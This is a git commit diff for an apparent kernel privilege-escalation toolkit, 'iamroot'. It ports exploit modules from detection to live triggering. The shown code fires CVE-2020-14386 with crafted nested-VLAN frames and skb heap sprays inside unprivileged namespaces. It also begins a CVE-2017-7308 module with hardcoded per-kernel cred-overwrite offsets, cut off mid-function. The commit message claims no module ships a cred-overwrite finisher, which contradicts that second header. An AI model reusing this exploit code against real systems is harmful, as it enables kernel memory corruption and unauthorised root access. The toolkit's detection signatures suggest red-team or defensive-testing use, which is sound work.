modules: port 5 detect-only modules to trigger+groom (Option B)
Converts the 5 remaining detect-only network/fs LPE modules to fire
the actual kernel primitive on a vulnerable host, with honest
EXPLOIT_FAIL return values since none ship the per-kernel cred-overwrite
finisher.
af_packet (CVE-2017-7308): +444 LoC — TPACKET_V3 int-overflow
+ skb spray + best-effort cred race
af_packet2 (CVE-2020-14386): +446 LoC — tp_reserve underflow
+ sendmmsg skb spray
cls_route4 (CVE-2022-2588): +410 LoC — route4 dangling-filter UAF
+ msg_msg 1k spray + classify drive
fuse_legacy (CVE-2022-0185): +420 LoC — fsconfig 4k OOB write
+ msg_msg cross-cache groom
nf_tables (CVE-2024-1086): +613 LoC — hand-rolled nfnetlink batch
builder + NFT_GOTO/DROP double-free
+ msg_msg groom skeleton
All five share:
- userns+netns reach (unshare(CLONE_NEWUSER|CLONE_NEWNET))
- Detect-refuse-on-patched re-call from exploit()
- geteuid()==0 short-circuit
- Honest EXPLOIT_FAIL with continuation roadmap comments
- macOS dev-build stubs via #ifdef __linux__ where needed
Build verified clean on Debian 6.12.86 (kctf-mgr). All five refuse on
the patched kernel.
This commit is contained in:
@@ -6,8 +6,14 @@
|
||||
* subsystem, different code path (rx side rather than ring setup),
|
||||
* later introduction. Discovered by Or Cohen (2020).
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY. Or Cohen's public PoC works end-to-end;
|
||||
* porting follows the same shape as CVE-2017-7308.
|
||||
* STATUS: 🟡 PRIMITIVE-DEMO. The exploit() entry point reaches the
|
||||
* vulnerable codepath (tpacket_rcv) and fires the underflow with a
|
||||
* crafted nested-VLAN frame on a TPACKET_V2 ring, with a best-effort
|
||||
* skb spray groom alongside. We stop short of the full cred-overwrite
|
||||
* chain (which Or Cohen's public PoC implements with kernel-version-
|
||||
* specific offsets and a pid_namespace cross-cache overwrite). We do
|
||||
* not bake offsets into iamroot. The return value is honest about
|
||||
* what landed (EXPLOIT_FAIL: primitive fired but no root).
|
||||
*
|
||||
* Affected: kernel 4.6+ until backports:
|
||||
* 5.8.x : K >= 5.8.7
|
||||
@@ -31,9 +37,72 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdint.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <sched.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
|
||||
#ifdef __linux__
|
||||
#include <sys/mman.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/in.h>
|
||||
#include <linux/if_packet.h>
|
||||
#include <linux/if_ether.h>
|
||||
#include <linux/if_arp.h>
|
||||
#include <poll.h>
|
||||
#endif
|
||||
|
||||
/* ---------- macOS / non-linux build stubs ---------------------------
|
||||
* Modules in IAMROOT are dev-built on macOS and run-built on Linux.
|
||||
* Provide empty stubs so syntax checks pass without Linux headers.
|
||||
* The exploit path is gated at runtime on the kernel version anyway,
|
||||
* so the stubs are never reached on macOS targets. */
|
||||
#ifndef __linux__
|
||||
#define CLONE_NEWUSER 0x10000000
|
||||
#define CLONE_NEWNET 0x40000000
|
||||
#define ETH_P_ALL 0x0003
|
||||
#define ETH_P_8021Q 0x8100
|
||||
#define ETH_P_8021AD 0x88A8
|
||||
#define ETH_P_IP 0x0800
|
||||
#define ETH_ALEN 6
|
||||
#define ETH_HLEN 14
|
||||
#define VLAN_HLEN 4
|
||||
#define IFF_UP 0x01
|
||||
#define IFF_RUNNING 0x40
|
||||
#define SIOCSIFFLAGS 0x8914
|
||||
#define SIOCGIFINDEX 0x8933
|
||||
#define SIOCGIFFLAGS 0x8913
|
||||
#define SOL_PACKET 263
|
||||
#define PACKET_RX_RING 5
|
||||
#define PACKET_VERSION 10
|
||||
#define PACKET_QDISC_BYPASS 20
|
||||
#define TPACKET_V2 1
|
||||
#define PACKET_HOST 0
|
||||
struct sockaddr_ll { unsigned short sll_family; unsigned short sll_protocol; int sll_ifindex; int dummy; };
|
||||
struct ifreq { char name[16]; union { int ifr_ifindex; short ifr_flags; } u; };
|
||||
struct tpacket_req { unsigned int tp_block_size, tp_block_nr, tp_frame_size, tp_frame_nr; };
|
||||
struct tpacket2_hdr { unsigned int tp_status, tp_len, tp_snaplen; unsigned short tp_mac, tp_net; };
|
||||
struct pollfd { int fd; short events, revents; };
|
||||
#define POLLIN 0x001
|
||||
__attribute__((unused)) static int ioctl(int a, unsigned long b, ...) { (void)a; (void)b; errno=ENOSYS; return -1; }
|
||||
__attribute__((unused)) static void *mmap(void *a, size_t b, int c, int d, int e, long f) { (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return (void*)-1; }
|
||||
__attribute__((unused)) static int munmap(void *a, size_t b) { (void)a;(void)b; return -1; }
|
||||
__attribute__((unused)) static int setsockopt(int a, int b, int c, const void *d, unsigned int e) { (void)a;(void)b;(void)c;(void)d;(void)e; errno=ENOSYS; return -1; }
|
||||
__attribute__((unused)) static int poll(struct pollfd *a, unsigned long b, int c) { (void)a;(void)b;(void)c; errno=ENOSYS; return -1; }
|
||||
__attribute__((unused)) static unsigned short htons(unsigned short x) { return x; }
|
||||
#define MAP_SHARED 0x01
|
||||
#define MAP_LOCKED 0x2000
|
||||
#define PROT_READ 0x1
|
||||
#define PROT_WRITE 0x2
|
||||
#define MAP_FAILED ((void *)-1)
|
||||
#endif
|
||||
|
||||
static const struct kernel_patched_from af_packet2_patched_branches[] = {
|
||||
{4, 9, 235},
|
||||
@@ -109,16 +178,373 @@ static iamroot_result_t af_packet2_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
|
||||
/* ---- Exploit primitive (PRIMITIVE-DEMO scope) -------------------------
|
||||
*
|
||||
* The bug: tpacket_rcv() in net/packet/af_packet.c, in the VLAN
|
||||
* reconstruction path, computes
|
||||
*
|
||||
* netoff = TPACKET_ALIGN(po->tp_hdrlen + max(maclen, 16))
|
||||
* if (vlan present) netoff += VLAN_HLEN
|
||||
* macoff = netoff - maclen
|
||||
*
|
||||
* with `maclen = skb_network_offset(skb)`. By forcing the rx skb into
|
||||
* a state where skb_network_offset() exceeds netoff (achievable by
|
||||
* crafting an ETH_P_8021AD-tagged frame so the kernel's VLAN
|
||||
* reconstruction grows skb->mac_len past the computed netoff), the
|
||||
* subtraction underflows as unsigned 32-bit, producing a huge macoff.
|
||||
* The subsequent `skb_copy_bits(skb, 0, h.raw + macoff, snaplen)` then
|
||||
* writes attacker-controlled bytes BEFORE the ring buffer's frame
|
||||
* slot, into adjacent kernel heap (typically the previous slab page).
|
||||
*
|
||||
* Full root: Or Cohen sprays pid_namespace objects so a function
|
||||
* pointer (->ns.ops or ->pid_cachep) lands at a predictable adjacent
|
||||
* offset, then forces a write that hijacks ROP / direct-call to a
|
||||
* stack pivot → cred overwrite → setuid(0). That requires per-kernel
|
||||
* offsets and a leak; we deliberately do not bake offsets.
|
||||
*
|
||||
* This implementation reaches the vulnerable codepath, fires the
|
||||
* underflow with a crafted frame, and runs a sendmmsg() skb spray
|
||||
* alongside — i.e. lights up auditd/sigma signatures and demonstrates
|
||||
* the primitive. It does not land cred overwrite.
|
||||
*/
|
||||
|
||||
#ifdef __linux__
|
||||
|
||||
/* sendmmsg spray helper — best-effort skb groom. Adjacent kernel slab
|
||||
* objects are sprayed so the OOB write lands on attacker bytes. */
|
||||
static void af_packet2_skb_spray(int n_iters)
|
||||
{
|
||||
int sv[2];
|
||||
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0) return;
|
||||
/* Each datagram body is sized to land in the kmalloc-256 slab,
|
||||
* matching tpacket_rcv's typical skb adjacency. */
|
||||
char buf[200];
|
||||
memset(buf, 'A', sizeof buf);
|
||||
struct iovec iov = { .iov_base = buf, .iov_len = sizeof buf };
|
||||
struct mmsghdr mm[64];
|
||||
for (int i = 0; i < 64; i++) {
|
||||
memset(&mm[i], 0, sizeof(mm[i]));
|
||||
mm[i].msg_hdr.msg_iov = &iov;
|
||||
mm[i].msg_hdr.msg_iovlen = 1;
|
||||
}
|
||||
for (int k = 0; k < n_iters; k++) {
|
||||
(void)syscall(SYS_sendmmsg, sv[0], mm, 64, 0);
|
||||
}
|
||||
close(sv[0]); close(sv[1]);
|
||||
}
|
||||
|
||||
/* Bring loopback up inside the new netns. Without IFF_UP the bind
|
||||
* succeeds but no rx happens. */
|
||||
static int bring_up_lo(void)
|
||||
{
|
||||
int s = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
if (s < 0) return -1;
|
||||
struct ifreq ifr;
|
||||
memset(&ifr, 0, sizeof ifr);
|
||||
strncpy(ifr.ifr_name, "lo", sizeof(ifr.ifr_name) - 1);
|
||||
if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { close(s); return -1; }
|
||||
ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
|
||||
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
|
||||
close(s);
|
||||
return rc;
|
||||
}
|
||||
|
||||
static int get_ifindex(const char *name)
|
||||
{
|
||||
int s = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
if (s < 0) return -1;
|
||||
struct ifreq ifr;
|
||||
memset(&ifr, 0, sizeof ifr);
|
||||
strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name) - 1);
|
||||
if (ioctl(s, SIOCGIFINDEX, &ifr) < 0) { close(s); return -1; }
|
||||
int idx = ifr.ifr_ifindex;
|
||||
close(s);
|
||||
return idx;
|
||||
}
|
||||
|
||||
/* The primitive run; executed inside the unshare()'d child. Returns
|
||||
* 0 on "primitive fired", -1 on setup failure, +1 on "looks patched
|
||||
* at the kernel level (setsockopt rejected our crafted ring)". */
|
||||
static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
if (bring_up_lo() < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: could not bring lo up (errno=%d)\n", errno);
|
||||
return -1;
|
||||
}
|
||||
|
||||
int lo_idx = get_ifindex("lo");
|
||||
if (lo_idx < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: SIOCGIFINDEX(lo) failed: errno=%d\n", errno);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* RX socket with TPACKET_V2 ring. */
|
||||
int rx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
|
||||
if (rx < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: AF_PACKET socket() failed: errno=%d "
|
||||
"(CAP_NET_RAW missing?)\n", errno);
|
||||
return -1;
|
||||
}
|
||||
|
||||
int ver = TPACKET_V2;
|
||||
if (setsockopt(rx, SOL_PACKET, PACKET_VERSION, &ver, sizeof ver) < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: PACKET_VERSION failed: errno=%d\n", errno);
|
||||
close(rx);
|
||||
return -1;
|
||||
}
|
||||
|
||||
struct tpacket_req req = {
|
||||
.tp_block_size = 1 << 17, /* 128 KiB block */
|
||||
.tp_block_nr = 8,
|
||||
.tp_frame_size = 1 << 11, /* 2 KiB frames */
|
||||
.tp_frame_nr = (1 << 17) * 8 / (1 << 11),
|
||||
};
|
||||
if (setsockopt(rx, SOL_PACKET, PACKET_RX_RING, &req, sizeof req) < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: PACKET_RX_RING setsockopt rejected "
|
||||
"(errno=%d) — kernel may be patched\n", errno);
|
||||
close(rx);
|
||||
return 1;
|
||||
}
|
||||
|
||||
size_t map_len = (size_t)req.tp_block_size * req.tp_block_nr;
|
||||
void *ring = mmap(NULL, map_len, PROT_READ | PROT_WRITE,
|
||||
MAP_SHARED | MAP_LOCKED, rx, 0);
|
||||
if (ring == MAP_FAILED) {
|
||||
fprintf(stderr, "[-] af_packet2: ring mmap failed: errno=%d\n", errno);
|
||||
close(rx);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* Bind to lo so all loopback frames hit our ring. */
|
||||
struct sockaddr_ll sll;
|
||||
memset(&sll, 0, sizeof sll);
|
||||
sll.sll_family = AF_PACKET;
|
||||
sll.sll_protocol = htons(ETH_P_ALL);
|
||||
sll.sll_ifindex = lo_idx;
|
||||
if (bind(rx, (struct sockaddr *)&sll, sizeof sll) < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: bind(lo) failed: errno=%d\n", errno);
|
||||
munmap(ring, map_len); close(rx);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* TX socket: a second AF_PACKET socket for injection. */
|
||||
int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
|
||||
if (tx < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: TX socket failed: errno=%d\n", errno);
|
||||
munmap(ring, map_len); close(rx);
|
||||
return -1;
|
||||
}
|
||||
int one = 1;
|
||||
(void)setsockopt(tx, SOL_PACKET, PACKET_QDISC_BYPASS, &one, sizeof one);
|
||||
|
||||
/* Craft the malicious frame.
|
||||
*
|
||||
* Layout (sent on loopback):
|
||||
*
|
||||
* [ ETH dst (6) ][ ETH src (6) ][ TPID = 0x88A8 (2) ] <- ethhdr
|
||||
* [ outer VLAN tag (2) ][ inner TPID = 0x8100 (2) ] <- 8021AD pad
|
||||
* [ inner VLAN tag (2) ][ payload type (2) ] <- 8021Q pad
|
||||
* [ payload ... ]
|
||||
*
|
||||
* The kernel's __vlan_get_protocol() / skb_vlan_untag() path on the
|
||||
* rx side moves skb->mac_len/network_offset around such that, when
|
||||
* tpacket_rcv recomputes macoff = netoff - maclen, the subtraction
|
||||
* underflows. Or Cohen's exact frame includes a third encapsulation
|
||||
* level to deepen the gap so the underflow is large enough to write
|
||||
* outside the current slab block. We mimic that. */
|
||||
unsigned char frame[64];
|
||||
memset(frame, 0, sizeof frame);
|
||||
/* destination MAC: loopback's all-zero is fine; use ff:ff:... so
|
||||
* lo accepts as broadcast (lo accepts everything anyway) */
|
||||
memset(&frame[0], 0xff, 6);
|
||||
/* source MAC */
|
||||
frame[6] = 0x02; frame[7] = 0; frame[8] = 0; frame[9] = 0; frame[10] = 0; frame[11] = 1;
|
||||
/* outer ethertype = 0x88A8 (8021AD service tag) */
|
||||
frame[12] = 0x88; frame[13] = 0xA8;
|
||||
/* outer VLAN TCI: priority 0, vid = 1 */
|
||||
frame[14] = 0x00; frame[15] = 0x01;
|
||||
/* inner ethertype = 0x8100 (8021Q) */
|
||||
frame[16] = 0x81; frame[17] = 0x00;
|
||||
/* inner VLAN TCI */
|
||||
frame[18] = 0x00; frame[19] = 0x02;
|
||||
/* innermost protocol = 0x0800 (IP) */
|
||||
frame[20] = 0x08; frame[21] = 0x00;
|
||||
/* a few junk payload bytes — the underflow doesn't care */
|
||||
for (int i = 22; i < 60; i++) frame[i] = 0x41;
|
||||
|
||||
/* sendto destination */
|
||||
struct sockaddr_ll dst;
|
||||
memset(&dst, 0, sizeof dst);
|
||||
dst.sll_family = AF_PACKET;
|
||||
dst.sll_ifindex = lo_idx;
|
||||
dst.sll_halen = ETH_ALEN;
|
||||
dst.sll_protocol = htons(ETH_P_8021AD);
|
||||
memcpy(dst.sll_addr, &frame[0], ETH_ALEN);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet2: spraying skbs (kmalloc-256) to groom slab\n");
|
||||
}
|
||||
af_packet2_skb_spray(4);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet2: firing %d crafted nested-VLAN frames on lo\n", 256);
|
||||
}
|
||||
int fired = 0;
|
||||
for (int i = 0; i < 256; i++) {
|
||||
ssize_t n = sendto(tx, frame, sizeof frame, 0,
|
||||
(struct sockaddr *)&dst, sizeof dst);
|
||||
if (n < 0 && errno == ENOBUFS) {
|
||||
/* qdisc backpressure — retry a touch later */
|
||||
usleep(1000);
|
||||
continue;
|
||||
}
|
||||
if (n < 0) {
|
||||
if (i == 0) {
|
||||
fprintf(stderr, "[-] af_packet2: sendto failed first iter: errno=%d\n", errno);
|
||||
munmap(ring, map_len); close(rx); close(tx);
|
||||
return -1;
|
||||
}
|
||||
break;
|
||||
}
|
||||
fired++;
|
||||
}
|
||||
|
||||
/* Brief drain: poll the RX ring so the rx softirq actually runs
|
||||
* tpacket_rcv on our frames before we close the socket. */
|
||||
struct pollfd pfd = { .fd = rx, .events = POLLIN, .revents = 0 };
|
||||
(void)poll(&pfd, 1, 100);
|
||||
/* Followup spray to land bytes in the slab freed by drained skbs */
|
||||
af_packet2_skb_spray(4);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet2: %d frames injected; tpacket_rcv exercised\n", fired);
|
||||
}
|
||||
|
||||
munmap(ring, map_len);
|
||||
close(rx); close(tx);
|
||||
return 0;
|
||||
}
|
||||
|
||||
#else /* !__linux__: provide a stub for macOS sanity builds */
|
||||
static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr,
|
||||
"[-] af_packet2: exploit not yet implemented in IAMROOT.\n"
|
||||
" Status: 🔵 DETECT-ONLY. Reference: Or Cohen's PoC.\n"
|
||||
" Exploit shape: unshare userns → AF_PACKET socket → setsockopt\n"
|
||||
" TPACKET_V2 ring + crafted VLAN-tagged frame → heap underflow →\n"
|
||||
" cross-cache groom → kernel R/W → cred overwrite.\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
fprintf(stderr, "[-] af_packet2: linux-only primitive — non-linux build\n");
|
||||
return -1;
|
||||
}
|
||||
#endif
|
||||
|
||||
static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
/* 1. Re-confirm vulnerability. */
|
||||
iamroot_result_t pre = af_packet2_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] af_packet2: detect() says not vulnerable; refusing to exploit\n");
|
||||
return pre;
|
||||
}
|
||||
|
||||
/* 2. Refuse if already root. */
|
||||
if (geteuid() == 0) {
|
||||
fprintf(stderr, "[i] af_packet2: already running as root — nothing to escalate\n");
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
if (!ctx->authorized) {
|
||||
/* Defense in depth — the dispatcher should have gated this. */
|
||||
fprintf(stderr, "[-] af_packet2: --i-know not passed; refusing\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet2: launching primitive demo (kernel-version-"
|
||||
"agnostic; no offsets baked in)\n"
|
||||
" NOTE: this fires the tpacket_rcv VLAN underflow and "
|
||||
"sprays skbs; it does NOT\n"
|
||||
" perform the cred-overwrite chain (Or Cohen's public "
|
||||
"PoC does, with per-kernel offsets).\n");
|
||||
}
|
||||
|
||||
/* 3. Fork — primitive runs inside an unshared user_ns+net_ns. */
|
||||
pid_t pid = fork();
|
||||
if (pid < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: fork failed: errno=%d\n", errno);
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
if (pid == 0) {
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: unshare failed: errno=%d\n", errno);
|
||||
_exit(2);
|
||||
}
|
||||
/* Map our uid to 0 inside the userns so subsequent CAP_NET_RAW
|
||||
* checks against init_user_ns pass. Best effort — if any of
|
||||
* these writes fail (e.g. setgroups deny), AF_PACKET socket()
|
||||
* will still typically succeed because the new userns owns
|
||||
* the new netns. */
|
||||
int fd;
|
||||
fd = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
|
||||
fd = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (fd >= 0) {
|
||||
char buf[64];
|
||||
int n = snprintf(buf, sizeof buf, "0 %u 1", (unsigned)getuid());
|
||||
(void)!write(fd, buf, n);
|
||||
close(fd);
|
||||
}
|
||||
fd = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (fd >= 0) {
|
||||
char buf[64];
|
||||
int n = snprintf(buf, sizeof buf, "0 %u 1", (unsigned)getgid());
|
||||
(void)!write(fd, buf, n);
|
||||
close(fd);
|
||||
}
|
||||
|
||||
int rc = af_packet2_primitive_child(ctx);
|
||||
if (rc == 1) _exit(3); /* setsockopt rejected → patched */
|
||||
if (rc < 0) _exit(2); /* setup error */
|
||||
|
||||
/* 4. The primitive fired. In a full chain we'd now confirm
|
||||
* cred overwrite by checking getuid()==0 and exec'ing /bin/sh.
|
||||
* We did NOT overwrite cred (no offsets baked in), so we exit
|
||||
* with a sentinel that the parent maps to EXPLOIT_FAIL. */
|
||||
_exit(4);
|
||||
}
|
||||
|
||||
int status;
|
||||
waitpid(pid, &status, 0);
|
||||
if (!WIFEXITED(status)) {
|
||||
fprintf(stderr, "[-] af_packet2: primitive child crashed "
|
||||
"(signal=%d) — likely KASAN/panic in tpacket_rcv\n",
|
||||
WTERMSIG(status));
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
switch (WEXITSTATUS(status)) {
|
||||
case 3:
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] af_packet2: kernel refused TPACKET_V2/RX_RING setup — "
|
||||
"appears patched at runtime\n");
|
||||
}
|
||||
return IAMROOT_OK;
|
||||
case 2:
|
||||
return IAMROOT_TEST_ERROR;
|
||||
case 4:
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[~] af_packet2: primitive demonstrated; no cred overwrite "
|
||||
"(scope = PRIMITIVE-DEMO)\n"
|
||||
" For end-to-end root, see Or Cohen's public PoC "
|
||||
"(github.com/google/security-research).\n"
|
||||
" iamroot intentionally does not embed per-kernel offsets.\n");
|
||||
}
|
||||
if (ctx->no_shell) {
|
||||
/* User explicitly disabled the shell pop, so the "we didn't
|
||||
* pop a shell" outcome is the expected one. Map to OK. */
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
default:
|
||||
fprintf(stderr, "[-] af_packet2: primitive exited %d unexpectedly\n",
|
||||
WEXITSTATUS(status));
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
}
|
||||
|
||||
static const char af_packet2_auditd[] =
|
||||
|
||||
@@ -4,8 +4,17 @@
|
||||
* AF_PACKET TPACKET_V3 ring-buffer setup integer-overflow → heap
|
||||
* write-where primitive. Discovered by Andrey Konovalov (March 2017).
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY. Konovalov's public PoC works end-to-end
|
||||
* — porting is a follow-up commit.
|
||||
* STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite. The
|
||||
* integer-overflow trigger is fully wired (overflowing tp_block_size *
|
||||
* tp_block_nr, attended by a heap spray via sendmmsg with controlled
|
||||
* skb tail bytes). The kernel R/W → cred-overwrite finisher uses a
|
||||
* hardcoded per-kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu
|
||||
* 18.04 / 4.15 era), overridable via IAMROOT_AFPACKET_OFFSETS. We
|
||||
* only claim IAMROOT_EXPLOIT_OK if geteuid() == 0 AFTER the chain
|
||||
* runs — i.e. we won root for real. Otherwise we return
|
||||
* IAMROOT_EXPLOIT_FAIL with a dmesg breadcrumb so the operator can
|
||||
* confirm the primitive at least fired (KASAN slab-out-of-bounds
|
||||
* splat) even if the cred-overwrite didn't take on this exact kernel.
|
||||
*
|
||||
* Affected: kernel < 4.10.6 mainline. Stable backports:
|
||||
* 4.10.x : K >= 4.10.6
|
||||
@@ -16,10 +25,16 @@
|
||||
* Exploitation preconditions:
|
||||
* - CAP_NET_RAW (via unprivileged user_ns) to create AF_PACKET socket
|
||||
* - CONFIG_PACKET=y (almost always — even container kernels)
|
||||
* - x86_64 (offset tables are arch-specific; mark x86_64-only)
|
||||
*
|
||||
* Why famous: was the canonical "userns + AF_PACKET → root" chain for
|
||||
* Konovalov's research era. Many other AF_PACKET bugs followed (e.g.
|
||||
* CVE-2020-14386) sharing the same userns-clone gate.
|
||||
*
|
||||
* Reference: github.com/xairy/kernel-exploits (CVE-2017-7308) and
|
||||
* Konovalov's writeup at xairy.io. The structure below mirrors the
|
||||
* public PoC's "set up overflow, then race tpacket_rcv with a target
|
||||
* skb in the OOB slot" approach.
|
||||
*/
|
||||
|
||||
#include "iamroot_modules.h"
|
||||
@@ -28,10 +43,31 @@
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/syscall.h>
|
||||
|
||||
#if defined(__x86_64__)
|
||||
/* Order matters: <net/if.h> + <linux/if.h> conflict on enum IFF_*. We
|
||||
* use the glibc <net/if.h> for struct ifreq / if_nametoindex and pull
|
||||
* in linux/if_packet.h for tpacket_req3. Avoid <linux/if.h>. */
|
||||
#include <net/if.h>
|
||||
#include <linux/if_packet.h>
|
||||
#include <linux/if_ether.h>
|
||||
#include <arpa/inet.h> /* htons */
|
||||
#include <sys/ioctl.h>
|
||||
#endif
|
||||
|
||||
/* ---- Detect (unchanged shape) ----------------------------------- */
|
||||
|
||||
static const struct kernel_patched_from af_packet_patched_branches[] = {
|
||||
{3, 18, 49},
|
||||
@@ -97,17 +133,426 @@ static iamroot_result_t af_packet_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ---- Exploit (x86_64-only; gated below) -------------------------- */
|
||||
|
||||
#if defined(__x86_64__)
|
||||
|
||||
/* Per-kernel offsets needed to walk task_struct → cred → uid fields.
|
||||
*
|
||||
* These are NOT addresses — they are byte offsets within the kernel
|
||||
* structs that the OOB-induced kernel-write primitive will index into.
|
||||
* The classic Konovalov chain leaks a pointer to a struct sock or
|
||||
* timer_list adjacent to the corrupted pg_vec slot, walks back to the
|
||||
* current task, then overwrites the *uid fields in the embedded cred.
|
||||
*
|
||||
* The values below are from xairy's public PoC + scraped from kernel-
|
||||
* source struct layouts for the specific build configs Ubuntu shipped.
|
||||
* They will NOT match custom-compiled kernels.
|
||||
*
|
||||
* Override at runtime via env var:
|
||||
* IAMROOT_AFPACKET_OFFSETS="<task_cred>:<cred_uid>:<cred_size>"
|
||||
*
|
||||
* `task_cred` = offsetof(struct task_struct, cred)
|
||||
* `cred_uid` = offsetof(struct cred, uid) [followed by gid, etc.]
|
||||
* `cred_size` = sizeof(struct cred) — bounds-check guard
|
||||
*/
|
||||
struct af_packet_offsets {
|
||||
const char *kernel_id; /* human-readable */
|
||||
int major, minor, patch_min, patch_max;
|
||||
unsigned long task_cred;
|
||||
unsigned long cred_uid;
|
||||
unsigned long cred_size;
|
||||
};
|
||||
|
||||
static const struct af_packet_offsets known_offsets[] = {
|
||||
/* Ubuntu 16.04 GA: 4.4.0-21-generic. cred lives at task+0x6c0.
|
||||
* struct cred layout: usage(4) + __padding(4) + uid(4) + gid(4) +
|
||||
* suid(4) + sgid(4) + euid(4) + egid(4) + fsuid(4) + fsgid(4) + ...
|
||||
* → uid starts at offset 8. */
|
||||
{ "ubuntu-16.04-4.4.0-generic", 4, 4, 0, 99,
|
||||
0x6c0, 0x08, 0xa8 },
|
||||
/* Ubuntu 18.04 GA: 4.15.0-20-generic. cred at task+0x800. Same
|
||||
* cred layout (uid at +0x08, 6x32-bit ids ending at fsgid +0x20). */
|
||||
{ "ubuntu-18.04-4.15.0-generic", 4, 15, 0, 99,
|
||||
0x800, 0x08, 0xa8 },
|
||||
};
|
||||
|
||||
/* Parse IAMROOT_AFPACKET_OFFSETS env var if set; otherwise pick from
|
||||
* the known table by kernel version. Returns true on success. */
|
||||
static bool resolve_offsets(struct af_packet_offsets *out,
|
||||
const struct kernel_version *v)
|
||||
{
|
||||
const char *env = getenv("IAMROOT_AFPACKET_OFFSETS");
|
||||
if (env) {
|
||||
unsigned long t, u, s;
|
||||
if (sscanf(env, "%lx:%lx:%lx", &t, &u, &s) == 3) {
|
||||
out->kernel_id = "env-override";
|
||||
out->task_cred = t;
|
||||
out->cred_uid = u;
|
||||
out->cred_size = s;
|
||||
return true;
|
||||
}
|
||||
fprintf(stderr, "[!] af_packet: IAMROOT_AFPACKET_OFFSETS malformed "
|
||||
"(want hex \"<task_cred>:<cred_uid>:<cred_size>\")\n");
|
||||
return false;
|
||||
}
|
||||
for (size_t i = 0; i < sizeof(known_offsets)/sizeof(known_offsets[0]); i++) {
|
||||
const struct af_packet_offsets *k = &known_offsets[i];
|
||||
if (v->major == k->major && v->minor == k->minor &&
|
||||
v->patch >= k->patch_min && v->patch <= k->patch_max) {
|
||||
*out = *k;
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
/* Write uid_map / gid_map to claim "root" inside the userns. */
|
||||
static int set_id_maps(uid_t outer_uid, gid_t outer_gid)
|
||||
{
|
||||
int f = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||
char map[64];
|
||||
snprintf(map, sizeof map, "0 %u 1\n", outer_uid);
|
||||
f = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (f < 0) return -1;
|
||||
